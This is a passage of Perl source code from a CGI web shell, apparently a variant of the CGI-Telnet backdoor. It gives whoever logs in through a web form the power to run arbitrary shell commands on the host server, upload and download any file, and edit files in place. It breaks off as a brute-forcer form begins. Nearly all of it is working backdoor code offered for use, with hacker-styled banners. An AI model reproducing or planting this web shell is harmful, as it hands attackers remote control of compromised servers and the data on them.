  3153. <font color="#F00000"><font color="#FFF000">$ServerName~</font>\$ Connected Command! </font><br>
  3154. <font color="#009900"><font color="#FFF000">$ServerName~<font color="#F00000">\$</font></font> OK! You can kill it!</font>
  3155. </tr>
  3156. </tbody></table>
  3157. <br>
  3158.  
  3159. <script type="text/javascript">
  3160. new TypingText(document.getElementById("hack"), 30, function(i){ var ar = new Array("_",""); return " " + ar[i.length % ar.length]; });
  3161. TypingText.runAll();
  3162.  
  3163. </script>
  3164. END
  3165. }
  3166.  
  3167. #------------------------------------------------------------------------------
  3168. # Add html special chars
  3169. #------------------------------------------------------------------------------
  3170. sub HtmlSpecialChars($){
  3171.     my $text = shift;
  3172.     $text =~ s/&/&amp;/g;
  3173.     $text =~ s/"/&quot;/g;
  3174.     $text =~ s/'/&#039;/g;
  3175.     $text =~ s/</&lt;/g;
  3176.     $text =~ s/>/&gt;/g;
  3177.     return $text;
  3178. }
  3179. #------------------------------------------------------------------------------
  3180. # Add link for directory
  3181. #------------------------------------------------------------------------------
  3182. sub AddLinkDir($)
  3183. {
  3184.     my $ac=shift;
  3185.     my @dir=();
  3186.     if($WinNT)
  3187.     {
  3188.         @dir=split(/\\/,$CurrentDir);
  3189.     }else
  3190.     {
  3191.         @dir=split("/",&trim($CurrentDir));
  3192.     }
  3193.     my $path="";
  3194.     my $result="";
  3195.     foreach (@dir)
  3196.     {
  3197.         $path .= $_.$PathSep;
  3198.         $result.="<a href='?a=".$ac."&d=".$path."'>".$_.$PathSep."</a>";
  3199.     }
  3200.     return $result;
  3201. }
  3202. #------------------------------------------------------------------------------
  3203. # Prints the message that informs the user of a failed login
  3204. #------------------------------------------------------------------------------
  3205. sub PrintLoginFailedMessage
  3206. {
  3207.     print <<END;
  3208. <br>Login : Administrator<br>
  3209.  
  3210. Password:<br>
  3211. Login incorrect<br><br>
  3212. END
  3213. }
  3214.  
  3215. #------------------------------------------------------------------------------
  3216. # Prints the HTML form for logging in
  3217. #------------------------------------------------------------------------------
  3218. sub PrintLoginForm
  3219. {
  3220.     print <<END;
  3221. <form name="f" method="POST" action="$ScriptLocation">
  3222. <input type="hidden" name="a" value="login">
  3223. Login : Administrator<br>
  3224. Password:<input type="password" name="p">
  3225. <input class="submit" type="submit" value="Enter">
  3226. </form>
  3227. END
  3228. }
  3229.  
  3230. #------------------------------------------------------------------------------
  3231. # Prints the footer for the HTML Page
  3232. #------------------------------------------------------------------------------
  3233. sub PrintPageFooter
  3234. {
  3235.     print "<br><font color=red>o---[  <font color=#ff9900>Edit by $EditPersion </font>  ]---o</font></code></center></body></html>";
  3236. }
  3237.  
  3238. #------------------------------------------------------------------------------
  3239. # Retreives the values of all cookies. The cookies can be accesses using the
  3240. # variable $Cookies{''}
  3241. #------------------------------------------------------------------------------
  3242. sub GetCookies
  3243. {
  3244.     @hxxpcookies = split(/; /,$ENV{'hxxp_COOKIE'});
  3245.     foreach $cookie(@hxxpcookies)
  3246.     {
  3247.         ($id, $val) = split(/=/, $cookie);
  3248.         $Cookies{$id} = $val;
  3249.     }
  3250. }
  3251.  
  3252. #------------------------------------------------------------------------------
  3253. # Prints the screen when the user logs out
  3254. #------------------------------------------------------------------------------
  3255. sub PrintLogoutScreen
  3256. {
  3257.     print "Connection closed by foreign host.<br><br>";
  3258. }
  3259.  
  3260. #------------------------------------------------------------------------------
  3261. # Logs out the user and allows the user to login again
  3262. #------------------------------------------------------------------------------
  3263. sub PerformLogout
  3264. {
  3265.     print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  3266.     &PrintPageHeader("p");
  3267.     &PrintLogoutScreen;
  3268.  
  3269.     &PrintLoginScreen;
  3270.     &PrintLoginForm;
  3271.     &PrintPageFooter;
  3272.     exit;
  3273. }
  3274.  
  3275. #------------------------------------------------------------------------------
  3276. # This function is called to login the user. If the password matches, it
  3277. # displays a page that allows the user to run commands. If the password doens't
  3278. # match or if no password is entered, it displays a form that allows the user
  3279. # to login
  3280. #------------------------------------------------------------------------------
  3281. sub PerformLogin
  3282. {
  3283.     if($LoginPassword eq $Password) # password matched
  3284.     {
  3285.         print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  3286.         &PrintPageHeader;
  3287.         print &ListDir;
  3288.     }
  3289.     else # password didn't match
  3290.     {
  3291.         &PrintPageHeader("p");
  3292.         &PrintLoginScreen;
  3293.         if($LoginPassword ne "") # some password was entered
  3294.         {
  3295.             &PrintLoginFailedMessage;
  3296.  
  3297.         }
  3298.         &PrintLoginForm;
  3299.         &PrintPageFooter;
  3300.         exit;
  3301.     }
  3302. }
  3303.  
  3304. #------------------------------------------------------------------------------
  3305. # Prints the HTML form that allows the user to enter commands
  3306. #------------------------------------------------------------------------------
  3307. sub PrintCommandLineInputForm
  3308. {
  3309.     my $dir= "<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("command")."</span>";
  3310.     $Prompt = $WinNT ? "$dir > " : "<font color='#66ff66'>[admin\@$ServerName $dir]\$</font> ";
  3311.     return <<END;
  3312. <form name="f" method="POST" action="$ScriptLocation">
  3313.  
  3314. <input type="hidden" name="a" value="command">
  3315.  
  3316. <input type="hidden" name="d" value="$CurrentDir">
  3317. $Prompt
  3318. <input type="text" size="50" name="c">
  3319. <input class="submit"type="submit" value="Enter">
  3320. </form>
  3321. END
  3322. }
  3323.  
  3324. #------------------------------------------------------------------------------
  3325. # Prints the HTML form that allows the user to download files
  3326. #------------------------------------------------------------------------------
  3327. sub PrintFileDownloadForm
  3328. {
  3329.     my $dir = &AddLinkDir("download");
  3330.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  3331.     return <<END;
  3332. <form name="f" method="POST" action="$ScriptLocation">
  3333. <input type="hidden" name="d" value="$CurrentDir">
  3334. <input type="hidden" name="a" value="download">
  3335. $Prompt download<br><br>
  3336. Filename: <input class="file" type="text" name="f" size="35"><br><br>
  3337. Download: <input class="submit" type="submit" value="Begin">
  3338.  
  3339. </form>
  3340. END
  3341. }
  3342.  
  3343. #------------------------------------------------------------------------------
  3344. # Prints the HTML form that allows the user to upload files
  3345. #------------------------------------------------------------------------------
  3346. sub PrintFileUploadForm
  3347. {
  3348.     my $dir= &AddLinkDir("upload");
  3349.     $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ ";
  3350.     return <<END;
  3351. <form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  3352. $Prompt upload<br><br>
  3353. Filename: <input class="file" type="file" name="f" size="35"><br><br>
  3354. Options: &nbsp;<input type="checkbox" name="o" id="up" value="overwrite">
  3355. <label for="up">Overwrite if it Exists</label><br><br>
  3356. Upload:&nbsp;&nbsp;&nbsp;<input class="submit" type="submit" value="Begin">
  3357. <input type="hidden" name="d" value="$CurrentDir">
  3358. <input class="submit" type="hidden" name="a" value="upload">
  3359.  
  3360. </form>
  3361.  
  3362. END
  3363. }
  3364.  
  3365. #------------------------------------------------------------------------------
  3366. # This function is called when the timeout for a command expires. We need to
  3367. # terminate the script immediately. This function is valid only on Unix. It is
  3368. # never called when the script is running on NT.
  3369. #------------------------------------------------------------------------------
  3370. sub CommandTimeout
  3371. {
  3372.     if(!$WinNT)
  3373.     {
  3374.         alarm(0);
  3375.         return <<END;
  3376. </textarea>
  3377. <br><font color=yellow>
  3378. Command exceeded maximum time of $CommandTimeoutDuration second(s).</font>
  3379. <br><font size='6' color=red>Killed it!</font>
  3380. END
  3381.     }
  3382. }
  3383.  
  3384.  
  3385.  
  3386. #------------------------------------------------------------------------------
  3387. # This function displays the page that contains a link which allows the user
  3388. # to download the specified file. The page also contains a auto-refresh
  3389. # feature that starts the download automatically.
  3390. # Argument 1: Fully qualified filename of the file to be downloaded
  3391. #------------------------------------------------------------------------------
  3392. sub PrintDownloadLinkPage
  3393. {
  3394.     local($FileUrl) = @_;
  3395.     my $result="";
  3396.     if(-e $FileUrl) # if the file exists
  3397.     {
  3398.         # encode the file link so we can send it to the browser
  3399.         $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  3400.         $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  3401.         $HtmlMetaHeader = "<meta hxxp-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  3402.         &PrintPageHeader("c");
  3403.         $result .= <<END;
  3404. Sending File $TransferFile...<br>
  3405.  
  3406. If the download does not start automatically,
  3407. <a href="$DownloadLink">Click Here</a>
  3408. END
  3409.         $result .= &PrintCommandLineInputForm;
  3410.     }
  3411.     else # file doesn't exist
  3412.     {
  3413.         $result .= "Failed to download $FileUrl: $!";
  3414.         $result .= &PrintFileDownloadForm;
  3415.     }
  3416.     return $result;
  3417. }
  3418.  
  3419. #------------------------------------------------------------------------------
  3420. # This function reads the specified file from the disk and sends it to the
  3421. # browser, so that it can be downloaded by the user.
  3422. # Argument 1: Fully qualified pathname of the file to be sent.
  3423. #------------------------------------------------------------------------------
  3424. sub SendFileToBrowser
  3425. {
  3426.     my $result = "";
  3427.     local($SendFile) = @_;
  3428.     if(open(SENDFILE, $SendFile)) # file opened for reading
  3429.     {
  3430.         if($WinNT)
  3431.         {
  3432.             binmode(SENDFILE);
  3433.             binmode(STDOUT);
  3434.         }
  3435.         $FileSize = (stat($SendFile))[7];
  3436.         ($Filename = $SendFile) =~  m!([^/^\\]*)$!;
  3437.         print "Content-Type: application/x-unknown\n";
  3438.         print "Content-Length: $FileSize\n";
  3439.         print "Content-Disposition: attachment; filename=$1\n\n";
  3440.         print while(<SENDFILE>);
  3441.         close(SENDFILE);
  3442.         exit(1);
  3443.     }
  3444.     else # failed to open file
  3445.     {
  3446.         $result .= "Failed to download $SendFile: $!";
  3447.         $result .=&PrintFileDownloadForm;
  3448.     }
  3449.     return $result;
  3450. }
  3451.  
  3452.  
  3453. #------------------------------------------------------------------------------
  3454. # This function is called when the user downloads a file. It displays a message
  3455. # to the user and provides a link through which the file can be downloaded.
  3456. # This function is also called when the user clicks on that link. In this case,
  3457. # the file is read and sent to the browser.
  3458. #------------------------------------------------------------------------------
  3459. sub BeginDownload
  3460. {
  3461.     # get fully qualified path of the file to be downloaded
  3462.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  3463.         (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  3464.     {
  3465.         $TargetFile = $TransferFile;
  3466.     }
  3467.     else # path is relative
  3468.     {
  3469.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  3470.         $TargetFile .= $PathSep.$TransferFile;
  3471.     }
  3472.  
  3473.     if($Options eq "go") # we have to send the file
  3474.     {
  3475.         &SendFileToBrowser($TargetFile);
  3476.     }
  3477.     else # we have to send only the link page
  3478.     {
  3479.         &PrintDownloadLinkPage($TargetFile);
  3480.     }
  3481. }
  3482.  
  3483. #------------------------------------------------------------------------------
  3484. # This function is called when the user wants to upload a file. If the
  3485. # file is not specified, it displays a form allowing the user to specify a
  3486. # file, otherwise it starts the upload process.
  3487. #------------------------------------------------------------------------------
  3488. sub UploadFile
  3489. {
  3490.     # if no file is specified, print the upload form again
  3491.     if($TransferFile eq "")
  3492.     {
  3493.         return &PrintFileUploadForm;
  3494.  
  3495.     }
  3496.     my $result="";
  3497.     # start the uploading process
  3498.     $result .= "Uploading $TransferFile to $CurrentDir...<br>";
  3499.  
  3500.     # get the fullly qualified pathname of the file to be created
  3501.     chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  3502.     $TransferFile =~ m!([^/^\\]*)$!;
  3503.     $TargetName .= $PathSep.$1;
  3504.  
  3505.     $TargetFileSize = length($in{'filedata'});
  3506.     # if the file exists and we are not supposed to overwrite it
  3507.     if(-e $TargetName && $Options ne "overwrite")
  3508.     {
  3509.         $result .= "Failed: Destination file already exists.<br>";
  3510.     }
  3511.     else # file is not present
  3512.     {
  3513.         if(open(UPLOADFILE, ">$TargetName"))
  3514.         {
  3515.             binmode(UPLOADFILE) if $WinNT;
  3516.             print UPLOADFILE $in{'filedata'};
  3517.             close(UPLOADFILE);
  3518.             $result .= "Transfered $TargetFileSize Bytes.<br>";
  3519.             $result .= "File Path: $TargetName<br>";
  3520.         }
  3521.         else
  3522.         {
  3523.             $result .= "Failed: $!<br>";
  3524.         }
  3525.     }
  3526.     $result .= &PrintCommandLineInputForm;
  3527.     return $result;
  3528. }
  3529.  
  3530. #------------------------------------------------------------------------------
  3531. # This function is called when the user wants to download a file. If the
  3532. # filename is not specified, it displays a form allowing the user to specify a
  3533. # file, otherwise it displays a message to the user and provides a link
  3534. # through  which the file can be downloaded.
  3535. #------------------------------------------------------------------------------
  3536. sub DownloadFile
  3537. {
  3538.     # if no file is specified, print the download form again
  3539.     if($TransferFile eq "")
  3540.     {
  3541.         &PrintPageHeader("f");
  3542.         return &PrintFileDownloadForm;
  3543.     }
  3544.    
  3545.     # get fully qualified path of the file to be downloaded
  3546.     if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  3547.     {
  3548.         $TargetFile = $TransferFile;
  3549.     }
  3550.     else # path is relative
  3551.     {
  3552.         chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  3553.         $TargetFile .= $PathSep.$TransferFile;
  3554.     }
  3555.  
  3556.     if($Options eq "go") # we have to send the file
  3557.     {
  3558.         return &SendFileToBrowser($TargetFile);
  3559.     }
  3560.     else # we have to send only the link page
  3561.     {
  3562.         return &PrintDownloadLinkPage($TargetFile);
  3563.     }
  3564. }
  3565.  
  3566.  
  3567. #------------------------------------------------------------------------------
  3568. # This function is called to execute commands. It displays the output of the
  3569. # command and allows the user to enter another command. The change directory
  3570. # command is handled differently. In this case, the new directory is stored in
  3571. # an internal variable and is used each time a command has to be executed. The
  3572. # output of the change directory command is not displayed to the users
  3573. # therefore error messages cannot be displayed.
  3574. #------------------------------------------------------------------------------
  3575. sub ExecuteCommand
  3576. {
  3577.     my $result="";
  3578.     if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  3579.     {
  3580.         # we change the directory internally. The output of the
  3581.         # command is not displayed.
  3582.         $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  3583.         chop($CurrentDir = `$Command`);
  3584.         $result .= &PrintCommandLineInputForm;
  3585.  
  3586.         $result .= "Command: <run>$RunCommand </run><br><textarea cols='$cols' rows='$rows' spellcheck='false'>";
  3587.         # xuat thong tin khi chuyen den 1 thu muc nao do!
  3588.         $RunCommand= $WinNT?"dir":"dir -lia";
  3589.         $result .= &RunCmd;
  3590.     }elsif($RunCommand =~ m/^\s*edit\s+(.+)/)
  3591.     {
  3592.         $result .=  &SaveFileForm;
  3593.     }else
  3594.     {
  3595.         $result .= &PrintCommandLineInputForm;
  3596.         $result .= "Command: <run>$RunCommand</run><br><textarea id='data' cols='$cols' rows='$rows' spellcheck='false'>";
  3597.         $result .=&RunCmd;
  3598.     }
  3599.     $result .=  "</textarea>";
  3600.     return $result;
  3601. }
  3602.  
  3603. #------------------------------------------------------------------------
  3604. # run command
  3605. #------------------------------------------------------------------------
  3606.  
  3607. sub RunCmd
  3608. {
  3609.     my $result="";
  3610.     $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  3611.     if(!$WinNT)
  3612.     {
  3613.         $SIG{'ALRM'} = \&CommandTimeout;
  3614.         alarm($CommandTimeoutDuration);
  3615.     }
  3616.     if($ShowDynamicOutput) # show output as it is generated
  3617.     {
  3618.         $|=1;
  3619.         $Command .= " |";
  3620.         open(CommandOutput, $Command);
  3621.         while(<CommandOutput>)
  3622.         {
  3623.             $_ =~ s/(\n|\r\n)$//;
  3624.             $result .= &HtmlSpecialChars("$_\n");
  3625.         }
  3626.         $|=0;
  3627.     }
  3628.     else # show output after command completes
  3629.     {
  3630.         $result .= &HtmlSpecialChars('$Command');
  3631.     }
  3632.     if(!$WinNT)
  3633.     {
  3634.         alarm(0);
  3635.     }
  3636.     return $result;
  3637. }
  3638. #==============================================================================
  3639. # Form Save File
  3640. #==============================================================================
  3641. sub SaveFileForm
  3642. {
  3643.     my $result ="";
  3644.     substr($RunCommand,0,5)="";
  3645.     my $file=&trim($RunCommand);
  3646.     $save='<br><input name="a" type="submit" value="save" class="submit" >';
  3647.     $File=$CurrentDir.$PathSep.$RunCommand;
  3648.     my $dir="<span style='font: 11pt Verdana; font-weight: bold;'>".&AddLinkDir("gui")."</span>";
  3649.     if(-w $File)
  3650.     {
  3651.         $rows="23"
  3652.     }else
  3653.     {
  3654.         $msg="<br><font style='font: 15pt Verdana; color: yellow;' > Permission denied!<font><br>";
  3655.         $rows="20"
  3656.     }
  3657.     $Prompt = $WinNT ? "$dir > " : "<font color='#FFFFFF'>[admin\@$ServerName $dir]\$</font> ";
  3658.     $read=($WinNT)?"type":"less";
  3659.     $RunCommand = "$read \"$RunCommand\"";
  3660.     $result .=  <<END;
  3661.     <form name="f" method="POST" action="$ScriptLocation">
  3662.  
  3663.     <input type="hidden" name="d" value="$CurrentDir">
  3664.     $Prompt
  3665.     <input type="text" size="40" name="c">
  3666.     <input name="s" class="submit" type="submit" value="Enter">
  3667.     <br>Command: <run> $RunCommand </run>
  3668.     <input type="hidden" name="file" value="$file" > $save <br> $msg
  3669.     <br><textarea id="data" name="data" cols="$cols" rows="$rows" spellcheck="false">
  3670. END
  3671.    
  3672.     $result .= &RunCmd;
  3673.     $result .=  "</textarea>";
  3674.     $result .=  "</form>";
  3675.     return $result;
  3676. }
  3677. #==============================================================================
  3678. # Save File
  3679. #==============================================================================
  3680. sub SaveFile($)
  3681. {
  3682.     my $Data= shift ;
  3683.     my $File= shift;
  3684.     $File=$CurrentDir.$PathSep.$File;
  3685.     if(open(FILE, ">$File"))
  3686.     {
  3687.         binmode FILE;
  3688.         print FILE $Data;
  3689.         close FILE;
  3690.         return 1;
  3691.     }else
  3692.     {
  3693.         return 0;
  3694.     }
  3695. }
  3696. #------------------------------------------------------------------------------
  3697. # Brute Forcer Form
  3698. #------------------------------------------------------------------------------
  3699. sub BruteForcerForm
  3700. {
  3701.     my $result="";
  3702.     $result .= <<END;
  3703.